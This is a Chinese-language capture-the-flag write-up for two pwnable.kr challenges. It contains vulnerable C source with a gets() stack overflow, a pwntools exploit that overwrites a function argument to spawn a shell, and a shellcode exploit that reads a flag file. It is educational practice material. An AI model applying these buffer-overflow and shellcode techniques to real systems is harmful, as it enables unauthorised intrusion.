学习网址:
Hello World
C 程序源代码(./1.c):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| #include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}
|
exp 脚本(./1.py):
1
2
3
4
| from pwn import *
c = remote("pwnable.kr", 9000)
c.sendline("AAAA" * 13 + p32(0xcafebabe))
c.interactive()
|
ShellCode
获取源码和可执行文件的方式,需要先通过 ssh 连接的目标主机:
1
2
| ssh -p2222 asm@pwnable.kr
# 输入密码 guest
|
或者直接通过 scp 下载文件:
1
2
3
4
5
| scp -P 2222 asm@pwnable.kr:~/asm ./
# 输入密码 guest
scp -P 2222 asm@pwnable.kr:~/asm.c ./
# 输入密码 guest
|
exp.py 的内容:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| from pwn import *
p = process("./asm")
context.log_level = 'DEBUG'
gdb.attach(p)
context(arch='amd64', os='linux')
shellcode = shellcraft.amd64.pushstr("this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong")
shellcode += shellcraft.amd64.linux.open('rsp',0,0)
shellcode += shellcraft.amd64.linux.read('rax','rsp',0)
shellcode += shellcraft.amd64.linux.write(1, 'rsp', 100)
p.recvuntil('shellcode: ')
p.send(asm(shellcode))
log.success(p.recvall())
|
除了 I/O, process 返回的对象可以通过 gdb.attach(p) 将进程 attach 到 gdb 上。Attach 之后,gdb 便可以调试该程序来(设置 breakpoints,查看 stack,以及简单的反汇编)。